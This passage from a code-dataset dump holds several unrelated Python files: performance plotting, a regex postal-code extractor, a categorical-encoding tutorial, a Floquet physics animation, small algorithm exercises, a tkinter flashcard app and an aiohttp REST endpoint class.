pd\nimport os\n\n\n# Función para generar gráficos a partir de datos de rendimiento computacional.\ndef generar_graficas(directorio, archivo_csv, prefijo):\n datos = pd.read_csv(os.path.join(directorio, archivo_csv))\n datos_filtrados = datos[datos[\"TotalCores\"] > 1] # Filtra para TotalCores > 1\n\n # Gráfico de Speedup vs. TotalCores\n plt.figure(figsize=(10, 7))\n for size in sorted(datos_filtrados[\"MatrixSize\"].unique()):\n subset = datos_filtrados[datos_filtrados[\"MatrixSize\"] == size]\n plt.plot(\n subset[\"TotalCores\"], subset[\"Speedup\"], marker=\"o\", label=f\"Tamaño {size}\"\n )\n plt.xlabel(\"Total de Núcleos\")\n plt.ylabel(\"Speedup\")\n plt.title(\"Speedup vs. Total de Núcleos\")\n plt.legend()\n plt.savefig(\n os.path.join(directorio, f\"{prefijo}Speedup_vs_TotalCores.pdf\"), format=\"pdf\"\n )\n\n # Gráfico de Eficiencia vs. TotalCores\n plt.figure(figsize=(10, 8))\n for size in sorted(datos_filtrados[\"MatrixSize\"].unique()):\n subset = datos_filtrados[datos_filtrados[\"MatrixSize\"] == size]\n plt.plot(\n subset[\"TotalCores\"],\n subset[\"Eficiencia\"],\n marker=\"o\",\n label=f\"Tamaño {size}\",\n )\n plt.xlabel(\"Total de Núcleos\")\n plt.ylabel(\"Eficiencia\")\n plt.title(\"Eficiencia vs. Total de Núcleos\")\n plt.legend()\n plt.savefig(\n os.path.join(directorio, f\"{prefijo}Eficiencia_vs_TotalCores.pdf\"), format=\"pdf\"\n )\n\n # Gráfico de Tiempo vs. TotalCores para diferentes tamaños de matriz\n plt.figure(figsize=(10, 8))\n for size in sorted(datos[\"MatrixSize\"].unique()):\n subset = datos[datos[\"MatrixSize\"] == size]\n plt.plot(\n subset[\"TotalCores\"], subset[\"Time\"], marker=\"o\", label=f\"Tamaño {size}\"\n )\n plt.xlabel(\"Total de Núcleos\")\n plt.ylabel(\"Tiempo (microsegundos)\")\n plt.title(\n \"Tiempo de Ejecución vs. 
Total de Núcleos para diferentes tamaños de Matriz\"\n )\n plt.legend()\n plt.savefig(\n os.path.join(directorio, f\"{prefijo}Time_vs_TotalCores.pdf\"), format=\"pdf\"\n )\n\n # Repetir para otros gráficos y guardarlos en formato PDF\n\n\n# Solicita al usuario ingresar la ruta del directorio y un prefijo para los nombres de los archivos de gráficos\ndirectorio = input(\n \"Por favor, ingresa la ruta del directorio donde se encuentran los archivos: \"\n)\nprefijo = input(\n \"Por favor, ingresa el prefijo para los nombres de los archivos de gráficos: \"\n)\narchivo_csv = \"resultados_con_metricas.csv\"\n\n# Llama a la función para generar y guardar las gráficas\ngenerar_graficas(directorio, archivo_csv, prefijo)\n\n# Mensaje para informar al usuario que los gráficos han sido generados y guardados.\nprint(\n \"Todos los gráficos han sido generados y guardados como archivos .pdf en el directorio proporcionado.\"\n)\n","repo_name":"sergioarojasm98/Multiplicacion-de-Matrices-con-OpenMP","sub_path":"Data-Analytics-Scripts/hpc_plots.py","file_name":"hpc_plots.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71817507892","text":"import re\r\n\r\nendereco = \"Rua do Barulho 409, apartamente 323,\" \\\r\n \" Cidade, Estado, ES, 95085020\"\r\n\r\npadrao = re.compile(\"[0-9]{5}[-]?[0-9]{3}\")\r\n\r\nbusca = padrao.search(endereco)\r\nif busca:\r\n cep = busca.group()\r\n print(cep)\r\n","repo_name":"ArantesVini/extrator_url","sub_path":"extrator_cep.py","file_name":"extrator_cep.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4965777971","text":"\"\"\" \r\nCount or frequency encoding\r\n- In count encoding we replace the categories by the count of the observations that show that category in the dataset. \r\n- Similarly, we can replace the category by the frequency or percentage of observations in the dataset. \r\n- That is, if 10 of our 100 observations show the colour blue, we would replace blue by 10 if doing count encoding, or by 0.1 if replacing by the frequency. \r\n- These techniques capture the representation of each label in a dataset, but the encoding may not necessarily be predictive of the outcome. 
\r\n- These are, however, very popular encoding methods in Kaggle competitions.\r\n\r\nThe assumption of this technique is that the number of observations shown by each category is somewhat informative of the predictive power of that category.\r\n\r\nAdvantages\r\n- Simple\r\n- Does not expand the feature space\r\n\r\nDisadvantages\r\n- If 2 different categories appear the same amount of times in the dataset, that is, they appear in the same number of observations, they will be replaced by the same number: we may lose valuable information.\r\n- For example, if there are 10 observations for the category blue and 10 observations for the category red, both will be replaced by 10, and therefore, after the encoding, will appear to be the same thing.\r\n\r\nIn this example:\r\nWe will see how to perform count or frequency encoding with:\r\n- pandas\r\n\r\nAnd the advantages and limitations of each implementation using the House Prices dataset.\r\n \"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# load dataset\r\ndata = pd.read_csv('dataset/house-prices-advanced-regression-techniques/train.csv',\r\n                   usecols=['Neighborhood', 'Exterior1st', 'Exterior2nd', 'SalePrice'])\r\n\r\ndata.head()\r\n\"\"\" Neighborhood Exterior1st Exterior2nd SalePrice\r\n0 CollgCr VinylSd VinylSd 208500\r\n1 Veenker MetalSd MetalSd 181500\r\n2 CollgCr VinylSd VinylSd 223500\r\n3 Crawfor Wd Sdng Wd Shng 140000\r\n4 NoRidge VinylSd VinylSd 250000 \"\"\"\r\n\r\n# let's have a look at how many labels each variable has\r\nfor col in data.columns:\r\n    print(col, ': ', len(data[col].unique()), ' labels')\r\n\r\n\"\"\" Neighborhood : 25 labels\r\nExterior1st : 15 labels\r\nExterior2nd : 16 labels\r\nSalePrice : 663 labels \"\"\"\r\n\r\n\"\"\" \r\nImportant\r\n- When doing count transformation of categorical variables, it is important to calculate the count (or frequency = count / total observations) over the training set, and then use those numbers to replace the labels in the test set.\r\n \"\"\"\r\n# let's separate into training and testing set\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n    data[['Neighborhood', 'Exterior1st', 'Exterior2nd']],  # predictors\r\n    data['SalePrice'],  # target\r\n    test_size=0.3,  # percentage of obs in test set\r\n    random_state=0)  # seed to ensure reproducibility\r\n\r\nX_train.shape, X_test.shape\r\n((1022, 3), (438, 3))\r\n\r\n\"\"\" Count and Frequency encoding with pandas \"\"\"\r\n\r\n# let's obtain the counts for each one of the labels in the variable Neighbourhood\r\n\r\ncount_map = X_train['Neighborhood'].value_counts().to_dict()\r\n\r\ncount_map\r\n\"\"\" {'NAmes': 151,\r\n 'CollgCr': 105,\r\n 'OldTown': 73,\r\n 'Edwards': 71,\r\n 'Sawyer': 61,\r\n 'Somerst': 56,\r\n 'Gilbert': 55,\r\n 'NridgHt': 51,\r\n 'NWAmes': 51,\r\n 'SawyerW': 45,\r\n 'BrkSide': 41,\r\n 'Mitchel': 36,\r\n 'Crawfor': 35,\r\n 'Timber': 30,\r\n 'NoRidge': 30,\r\n 'ClearCr': 24,\r\n 'IDOTRR': 24,\r\n 'SWISU': 18,\r\n 'StoneBr': 16,\r\n 'Blmngtn': 12,\r\n 'MeadowV': 12,\r\n 'BrDale': 10,\r\n 'NPkVill': 7,\r\n 'Veenker': 6,\r\n 'Blueste': 2} \"\"\"\r\n\r\n# The dictionary contains the number of observations per category in Neighbourhood.\r\n\r\n# replace the labels with the counts\r\nX_train['Neighborhood'] = X_train['Neighborhood'].map(count_map)\r\nX_test['Neighborhood'] = X_test['Neighborhood'].map(count_map)\r\n\r\n# let's explore the result\r\nX_train['Neighborhood'].head(10)\r\n\"\"\" 64 105\r\n682 24\r\n960 41\r\n1384 71\r\n1100 18\r\n416 
61\r\n1034 35\r\n853 151\r\n472 71\r\n1011 71\r\nName: Neighborhood, dtype: int64 \"\"\"\r\n\r\n# if instead of the count we would like the frequency\r\n# we need only divide the count by the total number of observations:\r\n\r\nfrequency_map = (X_train['Exterior1st'].value_counts() / len(X_train) ).to_dict()\r\nfrequency_map\r\n\"\"\" {'VinylSd': 0.3561643835616438,\r\n 'HdBoard': 0.149706457925636,\r\n 'Wd Sdng': 0.14481409001956946,\r\n 'MetalSd': 0.1350293542074364,\r\n 'Plywood': 0.08414872798434442,\r\n 'CemntBd': 0.03816046966731898,\r\n 'BrkFace': 0.03424657534246575,\r\n 'WdShing': 0.02054794520547945,\r\n 'Stucco': 0.016634050880626222,\r\n 'AsbShng': 0.014677103718199608,\r\n 'Stone': 0.0019569471624266144,\r\n 'BrkComm': 0.0009784735812133072,\r\n 'ImStucc': 0.0009784735812133072,\r\n 'CBlock': 0.0009784735812133072,\r\n 'AsphShn': 0.0009784735812133072} \"\"\"\r\n\r\n# replace the labels with the frequencies\r\n\r\nX_train['Exterior1st'] = X_train['Exterior1st'].map(frequency_map)\r\nX_test['Exterior1st'] = X_test['Exterior1st'].map(frequency_map)\r\n\r\n# We can then put these commands into 2 functions as we did in the previous 3 examples, and loop over all the categorical variables.\r\n# If you don't know how to do this, please check any of the previous examples.","repo_name":"Akshaykumarcp/ML-Feature-Engineering","sub_path":"0.4_categorical encoding/0.4_count_or_frequency_encoding.py","file_name":"0.4_count_or_frequency_encoding.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23445039630","text":"import numpy as np\r\nimport matplotlib.pyplot as plt \r\nimport cmath \r\nimport math\r\nimport functools\r\nfrom scipy.linalg import expm\r\nimport seaborn as sns\r\nimport pandas as pd \r\nfrom mpl_toolkits.mplot3d import Axes3D \r\nimport matplotlib.animation as animation\r\n\r\n#parameters\r\nT = 20\r\nJ1 = (np.pi/2)/(np.sqrt(2))\r\nJ2 = (np.pi/4)/(np.sqrt(2))\r\nd = 4\r\nnx = 2\r\nny = 2\r\nNx = 20\r\nNy = 20\r\nv = 1\r\nkx_array = np.linspace(-np.pi,np.pi,Nx+1)\r\nky_array = np.linspace(-np.pi,np.pi,Ny+1)\r\n# print(ky_array)\r\nt_array = np.linspace(0.001*T,0.999*T,11)\r\ngap = 0\r\nlx = len(kx_array)-1\r\nly = len(ky_array)-1\r\nlt = len(t_array)\r\ntheta_array = np.linspace(np.pi/2,np.pi/2,1)\r\n\r\n#pauli matrix\r\ns0 = np.matrix([[1,0],[0,1]])\r\ns1 = np.matrix([[0,1],[1,0]])\r\ns2 = np.matrix([[0,-1j],[1j,0]])\r\ns3 = np.matrix([[1,0],[0,-1]])\r\n\r\n#generalized logarithm\r\ndef llog(z, theta):\r\n modulus = np.abs(z)\r\n argument = np.angle(z)\r\n if theta-2*np.pi <= argument < theta:\r\n argument = argument\r\n else:\r\n argument = theta-2*np.pi+np.mod(argument-theta, 2*np.pi)\r\n return np.log(modulus) + 1j*argument\r\n\r\n#states-sorting function\r\ndef ssort(x,y):\r\n e = -1j*np.log(x)\r\n x_sort_idx = np.argsort(e)[::-1]\r\n e = np.sort(e)[::-1]\r\n xx = [0 for index in range(len(x))]\r\n for i in range(len(x)):\r\n xx[i] = np.exp(1j*e[i])\r\n y = y[:,x_sort_idx]\r\n x = xx\r\n return x,y\r\n\r\ndef SSort(x,y):\r\n e = []\r\n for X in x:\r\n if gap == 0:\r\n E = -1j*llog(X,0)/T\r\n if gap == np.pi:\r\n E = -1j*llog(X,np.pi)/T\r\n e.append(E)\r\n x_sort_idx = np.argsort(e)[::1]\r\n e = np.sort(e)[::1]\r\n y = y[:,x_sort_idx]\r\n x = e\r\n return x,y\r\n\r\n#phase-fixing function\r\ndef fix(x,d):\r\n Phase = np.zeros(shape=(d,d),dtype=complex)\r\n for j in range(d):\r\n Phase[j,j] = np.exp(-1j*cmath.phase(x[0,j]))\r\n x = np.dot(x,Phase)\r\n return 
x\r\n\r\n#anomalous periodic operator\r\ndef U(kx,ky,t,theta):\r\n #Hamiltonians\r\n H1 = (2*J1/T)*(np.kron(s1,s0)-np.kron(s2,s2))+(0*2/T)*(np.sin(ny*ky)*np.kron(s3,s1)+np.cos(ny*ky)*np.kron(s3,s2)-0.4*np.cos(ny*ky)*np.kron(s0,s0))+(0.0001)*np.kron(s3,s0)\r\n H2 = (2*J2/T)*((np.cos(theta)*np.cos(kx)+np.sin(theta)*np.cos(nx*kx))*np.kron(s1,s0)-(np.cos(theta)*np.sin(kx)+np.sin(theta)*np.sin(nx*kx))*np.kron(s2,s3)-(np.cos(theta)*np.cos(ky)+np.sin(theta)*np.cos(ny*ky))*np.kron(s2,s2)-(np.cos(theta)*np.sin(ky)+np.sin(theta)*np.sin(ny*ky))*np.kron(s2,s1))+(0.0001)*np.kron(s3,s0)\r\n #Floquet operator\r\n UF = np.dot(expm(-1j*H1*(T/4)),np.dot(expm(-1j*H2*(T/2)),expm(-1j*H1*(T/4))))\r\n #sort by quasienergies\r\n eval,evec = np.linalg.eig(UF)\r\n evec = fix(evec,d)\r\n eval,evec = ssort(eval,evec)\r\n #fix phase\r\n\r\n #evolution operator\r\n r = int(t//T)\r\n\r\n if 0 <= t%T < T/4:\r\n U1 = np.dot(expm(-1j*H1*(t%T)),np.linalg.matrix_power(UF,r))\r\n if T/4 <= t%T < 3*T/4:\r\n U1 = np.dot(expm(-1j*H2*(t%T-T/4)),np.dot(expm(-1j*H1*(T/4)),np.linalg.matrix_power(UF,r)))\r\n if 3*T/4 <= t%T < T:\r\n U1 = np.dot(expm(-1j*H1*(t%T-3*T/4)),np.dot(expm(-1j*H2*(T/2)),np.dot(expm(-1j*H1*(T/4)),np.linalg.matrix_power(UF,r))))\r\n \r\n #anomalous periodic operator for two gaps\r\n if gap == 0:\r\n Eaval = [0 for index in range(len(eval))]\r\n for i in range(len(eval)):\r\n Eaval[i] = np.exp(-llog(eval[i],0)*(t/T))\r\n Smatpi = np.diag(Eaval)\r\n U2 = np.dot(evec, np.dot(Smatpi, np.linalg.inv(evec)))\r\n if gap == np.pi:\r\n Eaval = [0 for index in range(len(eval))]\r\n for i in range(len(eval)):\r\n Eaval[i] = np.exp(-llog(eval[i],np.pi)*(t/T))\r\n Smatpi = np.diag(Eaval)\r\n U2 = np.dot(evec, np.dot(Smatpi, np.linalg.inv(evec)))\r\n return np.dot(U1,U2)\r\n\r\nfor theta in theta_array:\r\n Kx_array = kx_array.tolist()\r\n Ky_array = ky_array.tolist()\r\n del(Kx_array[-1])\r\n del(Ky_array[-1])\r\n X, Y = np.meshgrid(Kx_array, Ky_array) \r\n EIG1 = []\r\n EIG2 = []\r\n for t in t_array:\r\n eigmatrix1 = np.zeros((lx,ly))\r\n eigmatrix2 = np.zeros((lx,ly))\r\n for i in range(lx):\r\n for j in range(ly):\r\n kx = kx_array[i]\r\n ky = ky_array[j]\r\n eigenvalue, eigenvector = np.linalg.eig(U(kx,ky,t,theta))\r\n quasienergy, eigenvector = SSort(eigenvalue,eigenvector)\r\n eigmatrix1[i,j] = (quasienergy[0]).real\r\n eigmatrix2[i,j] = (quasienergy[3]).real\r\n EIG1.append(eigmatrix1)\r\n EIG2.append(eigmatrix2)\r\n \r\n fig, ax = plt.subplots(tight_layout=True, figsize=(6, 6), subplot_kw=dict(projection='3d'))\r\n plot1 = [ax.plot_surface(X, Y, EIG1[0], cmap=plt.get_cmap('plasma'), linewidth=0)]\r\n plot2 = [ax.plot_surface(X, Y, EIG2[0], cmap=plt.get_cmap('plasma'), linewidth=0)]\r\n ax.set_xlabel('kx', fontsize=10, color='black') \r\n ax.set_ylabel('ky', fontsize=10, color='black') \r\n ax.set_zlabel('quasienergy', fontsize=10, color='black')\r\n\r\n\r\n ax.view_init(50, 120) \r\n\r\n def update_map1(num, z, plot):\r\n plot[0].remove()\r\n plot[0] = ax.plot_surface(X, Y, EIG1[num], cmap=plt.get_cmap('plasma'), linewidth=0)\r\n \r\n def update_map2(num, z, plot):\r\n plot[0].remove()\r\n plot[0] = ax.plot_surface(X, Y, EIG2[num], cmap=plt.get_cmap('plasma'), linewidth=0)\r\n\r\n ani1 = animation.FuncAnimation(fig, update_map1, 30, interval=500, fargs=(EIG1, plot1), repeat=True)\r\n ani2 = animation.FuncAnimation(fig, update_map2, 30, interval=500, fargs=(EIG2, plot2), repeat=True)\r\n plt.show()","repo_name":"Hiloxik/FBOTP","sub_path":"Total Codes/dynamical singularity-animation.py","file_name":"dynamical 
singularity-animation.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5966355834","text":"# https://programmers.co.kr/learn/courses/30/lessons/42576\r\n\r\ndef solution(participant, completion):\r\n    participant.sort()\r\n    completion.sort()\r\n    for i in range(len(completion)):\r\n        if completion[i] != participant[i]:\r\n            return participant[i]\r\n    # every finisher matched a participant, so the extra (last) participant did not finish;\r\n    # this also avoids a NameError when completion is empty\r\n    return participant[len(completion)]\r\n    ","repo_name":"kylew1004/algorithm","sub_path":"Programmers/코딩테스트 고득점 kit/해시/완주하지_못한_선수.py","file_name":"완주하지_못한_선수.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28230181276","text":"'''\nGiven a string, you can choose to split the string after one character or after two adjacent characters, so that the string is composed of pieces of only one or two characters. \nOutput all possible results.\n\nHave you met this question in a real interview? \nExample\nGiven the string \"123\"\nreturn [[\"1\",\"2\",\"3\"],[\"12\",\"3\"],[\"1\",\"23\"]]\n'''\n\nclass Solution:\n    \"\"\"\n    @param: : a string to be split\n    @return: all possible split string array\n    \"\"\"\n\n    def splitString(self, s):\n        # write your code here\n        res = []\n        self.helper(s, res, [])\n        return res\n    \n    def helper(self, s, res, cur):\n        if len(s) == 0:\n            res.append(cur[:])\n\n        for i in range(2):\n            if i + 1 <= len(s):\n                cur.append(s[:i + 1])\n                self.helper(s[i+1:], res, cur)\n                cur.pop()\n\ns = Solution()\nstr = '123'\nprint(s.splitString(str))","repo_name":"zsmountain/lintcode","sub_path":"python/combination/680_split_string.py","file_name":"680_split_string.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28717851377","text":"import random\nimport threading\nimport tkinter.messagebox\nimport typing\nfrom tkinter import Canvas, PhotoImage, DISABLED\nfrom tkinter.ttk import Button, Label\n\nimport pandas\nfrom ttkthemes import ThemedTk, ThemedStyle\nfrom PIL import Image, ImageTk\n\n# logging.basicConfig(level=logging.WARN)\n\n\nclass FlashCards(ThemedTk):\n    BACKGROUND_COLOR = \"#B1DDC6\"\n    WIDTH = 800\n    HEIGHT = 526\n    SCALE = .5\n    FONT_LANG = (\"Arial\", 30, 'italic')\n    FONT_WORD = ('Arial', 50, 'bold')\n    DELAY = 5\n    APP_TITLE = \"FlashCards App\"\n\n    def __init__(self):\n        super().__init__()\n\n        # Data elements\n        self.card_data: {str: str} = {}\n        self.card_data_index: int = 0\n        self.all_data: typing.Union[None, pandas.DataFrame] = None\n        if not self.load_data():\n            exit(0)\n        # Timer\n        self.timer: typing.Union[threading.Timer, None] = None\n\n        # UI elements\n        self.style = ThemedStyle()\n        self.canvas = Canvas()\n        self.images: {str: PhotoImage} = {\n            'right': ImageTk.PhotoImage(Image.open(\"images/right.png\").\n                                        resize((int(100 * self.SCALE), int(100 * self.SCALE)), Image.BILINEAR)),\n            'wrong': ImageTk.PhotoImage(Image.open(\"images/wrong.png\").\n                                        resize((int(100 * self.SCALE), int(100 * self.SCALE)), Image.BILINEAR)),\n            'front': ImageTk.PhotoImage(Image.open(\"images/card_front.png\").\n                                        resize((int(self.WIDTH * self.SCALE), int(self.HEIGHT * self.SCALE)),\n                                               Image.BILINEAR)),\n            'back': ImageTk.PhotoImage(Image.open(\"images/card_back.png\").\n                                       resize((int(self.WIDTH * self.SCALE), int(self.HEIGHT * self.SCALE)),\n                                              Image.BILINEAR))\n        }\n        self.buttons: {str: Button} = {\n            
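# --- Added example (illustrative only): the record above lives in the "해시" (hash) category, so
# --- here is a hash-based alternative to solution() using collections.Counter; same input/output
# --- contract, shown purely for comparison with the sorting approach.
from collections import Counter

def solution_hash(participant, completion):
    # multiset difference leaves exactly the one runner who did not finish
    leftover = Counter(participant) - Counter(completion)
    return next(iter(leftover))

# solution_hash(["leo", "kiki", "eden"], ["eden", "kiki"])  # -> "leo"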
'right': Button(),\n \"wrong\": Button()\n }\n self.labels: {str: Label} = {\n }\n\n self.card_image = None\n self.card_text_lang = None\n self.card_text_word = None\n\n self.generate_ui()\n self.show_new_card()\n\n def load_data(self) -> bool:\n def load_data_inner() -> bool:\n try:\n self.all_data = pandas.read_csv(file).transpose().to_dict()\n except pandas.errors.EmptyDataError:\n tkinter.messagebox.showerror(message=\"There are no data to learn.\")\n return False\n else:\n return True\n\n try:\n with open('data/words_to_learn.csv', 'r') as file:\n return load_data_inner()\n except FileNotFoundError:\n with open('data/french_words.csv', 'r') as file:\n return load_data_inner()\n\n def save_words_to_learn(self):\n with open('data/words_to_learn.csv', 'w', newline='') as file:\n # to keep the same format default index must be removed from the dataset\n pandas.DataFrame(pandas.DataFrame(self.all_data).transpose()).to_csv(file, index=False)\n\n def button_action_right(self):\n del self.all_data[self.card_data_index]\n self.save_words_to_learn()\n if self.load_data():\n self.show_new_card()\n else:\n for item in self.buttons.values():\n item['state'] = DISABLED\n self.card_data = {'Good Job': 'Nothing to learn.'}\n self.show_flashcard()\n\n def button_action_wrong(self):\n self.show_new_card()\n\n def show_new_card(self):\n if self.timer is not None:\n self.timer.cancel()\n self.timer = threading.Timer(self.DELAY, self.flip_card)\n\n self.card_data_index = random.SystemRandom().randint(0, len(self.all_data)-1)\n self.card_data = self.all_data[self.card_data_index]\n self.show_flashcard()\n self.timer.start()\n\n def flip_card(self):\n self.show_flashcard(side='back')\n\n def show_flashcard(self, side='front'):\n lang = tuple(self.card_data.keys())[0] if side == 'front' else tuple(self.card_data.keys())[-1]\n word = tuple(self.card_data.values())[0] if side == 'front' else tuple(self.card_data.values())[-1]\n self.canvas.itemconfig(self.card_image, image=self.images[side])\n self.canvas.itemconfig(self.card_text_lang, text=lang)\n self.canvas.itemconfig(self.card_text_word, text=word)\n\n self.canvas.update()\n\n def generate_ui(self):\n # logging.info(self.style.get_themes())\n self.title(self.APP_TITLE)\n\n self.config(padx=20, pady=20, background=self.BACKGROUND_COLOR, highlightcolor=self.BACKGROUND_COLOR)\n self.canvas.config(background=self.BACKGROUND_COLOR, width=self.SCALE * self.WIDTH,\n height=self.SCALE * self.HEIGHT,\n highlightthickness=0)\n self.buttons['right'].config(image=self.images['right'], command=self.button_action_right)\n self.buttons['wrong'].config(image=self.images['wrong'], command=self.button_action_wrong)\n\n self.canvas.grid(column=1, row=1, columnspan=2)\n self.buttons['right'].grid(column=1, row=2, columnspan=1, padx=10, pady=10)\n self.buttons['wrong'].grid(column=2, row=2, columnspan=1, padx=10, pady=10)\n\n self.card_image = self.canvas.create_image(self.SCALE * self.WIDTH / 2,\n self.SCALE * self.HEIGHT / 2)\n self.card_text_lang = self.canvas.create_text(self.SCALE * self.WIDTH / 2,\n self.SCALE * (self.HEIGHT / 2 - 150),\n font=self.FONT_LANG)\n self.card_text_word = self.canvas.create_text(self.SCALE * self.WIDTH / 2,\n self.SCALE * (self.HEIGHT / 2 + 100),\n font=self.FONT_WORD)\n\n self.style.set_theme('default')\n self.style.configure('TButton', background=self.BACKGROUND_COLOR,\n highlightcolor=self.BACKGROUND_COLOR, highlightthickness=0)\n\n my_map = [('active', self.BACKGROUND_COLOR),\n ('!active', self.BACKGROUND_COLOR),\n ('alternate', 
self.BACKGROUND_COLOR),\n                  ('!alternate', self.BACKGROUND_COLOR),\n                  ('background', self.BACKGROUND_COLOR),\n                  ('!background', self.BACKGROUND_COLOR),\n                  ('disabled', self.BACKGROUND_COLOR),\n                  ('!disabled', self.BACKGROUND_COLOR),\n                  ('focus', self.BACKGROUND_COLOR),\n                  ('!focus', self.BACKGROUND_COLOR),\n                  ('invalid', self.BACKGROUND_COLOR),\n                  ('!invalid', self.BACKGROUND_COLOR),\n                  ('pressed', self.BACKGROUND_COLOR),\n                  ('!pressed', self.BACKGROUND_COLOR),\n                  ('selected', self.BACKGROUND_COLOR),\n                  ('!selected', self.BACKGROUND_COLOR)]\n\n        self.style.map('.',\n                       background=my_map,\n                       highlightcolor=my_map,\n                       highlightbackground=my_map,\n                       activeforeground=my_map,\n                       activebackground=my_map,\n                       disabledforeground=my_map,\n                       indicatoron=my_map,\n                       )\n        self.style.map('TButton',\n                       background=my_map,\n                       highlightcolor=my_map,\n                       highlightbackground=my_map,\n                       activeforeground=my_map,\n                       activebackground=my_map,\n                       disabledforeground=my_map,\n                       indicatoron=my_map,\n                       )\n\n    def destroy(self):\n        if self.timer is not None:\n            self.timer.cancel()\n        super(FlashCards, self).destroy()\n\n\nFlashCards().mainloop()\n\n\n# >>> a = [ [ str(a)+\"x\"+str(b)+\",\"+str(a * b) for a in range(0,100) if a*b <= 100] for b in range(0,100)]\n# >>> for x in a:\n# ...     for y in x:\n# ...\n\n# >>> a = [ [ str(a)+\":\"+str(b)+\",\"+str(a/b)\n#             for a in range(0,100) if a/b <= 100 and (a/b)*b == a ] for b in range(1,100)]\n# >>> for x in a:\n# ...     for y in x:\n# ...             print(y)\n# ...\n","repo_name":"jakubbaginski/pythonbootcamp","sub_path":"001-031 - TODO REFACTORING/Day 031 Flash Cards/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69914363572","text":"lista = []\nx = int(input())\ny = int(input())\nlista.append(x)\nlista.append(y)\nx = max(lista)\ny = min(lista)\n\nfor i in range((y + 1), x):\n    if (i%5 == 2) or (i%5==3):\n        print(i)\n    ","repo_name":"luizgallas/uri_iniciante","sub_path":"1133.py","file_name":"1133.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72073004853","text":"import json\nfrom enum import Enum\n\nfrom aiohttp import web\nimport sqlalchemy as sa\n\n# TODO import apispec\nfrom aiohttp_security import permits\n\nclass RESTError(web.HTTPError):\n    status_code = 500\n    error = \"Unknown Error\"\n\n    def __init__(self, message=None, status_code=None, **kwargs):\n\n        if status_code is not None:\n            self.status_code = status_code\n\n        super().__init__(reason=message)\n        if not message:\n            message = self.error\n\n        msg_dict = {\"error\": message}\n\n        if kwargs:\n            msg_dict['error_details'] = kwargs\n\n        self.text = json.dumps(msg_dict)\n        self.content_type = 'application/json'\n\nclass ForbiddenError(RESTError):\n    status_code = 401\n    error = \"Access denied\"\n\nclass NotFoundError(RESTError):\n    status_code = 404\n    error = \"Not found\"\n\nclass MethodNotAllowed(RESTError):\n    status_code = 405\n    error = \"Method not allowed\"\n\nclass BadRequest(RESTError):\n    status_code = 400\n    error = 'Bad request'\n\n\nasync def require(request, permission):\n    has_perm = await permits(request, permission)\n    if not has_perm:\n        msg = 'User has no permission {}'.format(permission)\n        raise ForbiddenError(msg)\n\nclass Endpoint:\n    pool = None\n    model = None\n    schema = None\n    lookup_field = 'id'\n    lookup_regex = r'\\d+'\n    filters = []\n    path = '/endpoint'\n\n    def __init__(self, pool):\n        self.pool = pool\n\n    async 
def dispatch(self, request):\n method = request.method.lower()\n if not hasattr(self, method):\n raise MethodNotAllowed\n if 'id' not in request.match_info:\n method = 'list'\n return await getattr(self, method)(request, *request.match_info.values())\n\n async def get_object(self, object_id):\n async with self.pool.acquire() as conn:\n query = self.model.__table__.select().where(getattr(self.model, self.lookup_field) == object_id)\n row = await conn.execute(query)\n rec = await row.first()\n if not rec:\n raise NotFoundError\n return rec\n\n async def get(self, request, object_id):\n # await require(request, Permissions.view)\n rec = await self.get_object(object_id)\n return web.json_response(self.schema.dump(rec))\n\n async def list(self, request):\n # await require(request, Permissions.view)\n # def text_filter(query, value, table):\n # pairs = ((n, c) for n, c in table.c.items()\n # if isinstance(c.type, sa.sql.sqltypes.String))\n # sub_queries = []\n # for name, column in pairs:\n # do_compare = op(\"like\", column)\n # sub_queries.append(do_compare(column, value))\n #\n # query = query.where(or_(*sub_queries))\n # return query\n async with self.pool.acquire() as conn:\n query = self.model.__table__.select()\n count = await conn.scalar(\n sa.select([sa.func.count()]).select_from(query.alias('foo'))\n )\n # sort_dir = sa.asc if paging.sort_dir == ASC else sa.desc\n cursor = await conn.execute(query)\n # .offset(paging.offset)\n # .limit(paging.limit)\n # .order_by(sort_dir(paging.sort_field)))\n\n recs = await cursor.fetchall()\n headers = {'X-Total-Count': str(count)}\n return web.json_response(self.schema.dump(recs, many=True), headers=headers)\n\n async def post(self, request):\n # await require(request, Permissions.view)\n data = await request.json()\n errors = self.schema.validate(data)\n if errors:\n raise BadRequest(errors)\n async with self.pool.acquire() as conn:\n query = self.model.__table__.insert().values(data)\n rec = await conn.execute(query)\n await conn.execute('commit;')\n\n async def put(self, request, object_id):\n # await require(request, Permissions.edit)\n data = await request.json()\n rec = await self.get_object(object_id)\n errors = self.schema.validate(data)\n if errors:\n raise BadRequest(errors)\n async with self.pool.acquire() as conn:\n row = await conn.execute(\n self.model.__table__.update()\n .values(data))\n # .returning(*self.__table__.c)\n # .where(self._pk == entity_id))\n await conn.execute('commit;')\n\n async def patch(self, request, object_id):\n return await self.put(request, object_id)\n\n async def delete(self, request, object_id):\n # await require(request, Permissions.delete)\n async with self.pool.acquire() as conn:\n query = self.model.__table__.delete().where(getattr(self.model, self.lookup_field) == object_id)\n await conn.execute(query)\n # TODO: Think about autocommit by default\n await conn.execute('commit;')\n\n def setup_routes(self, router):\n router.add_route('*', f'{self.path}', self.dispatch)\n router.add_route('*', f'{self.path}/{{id}}', self.dispatch)\n\n\nimport 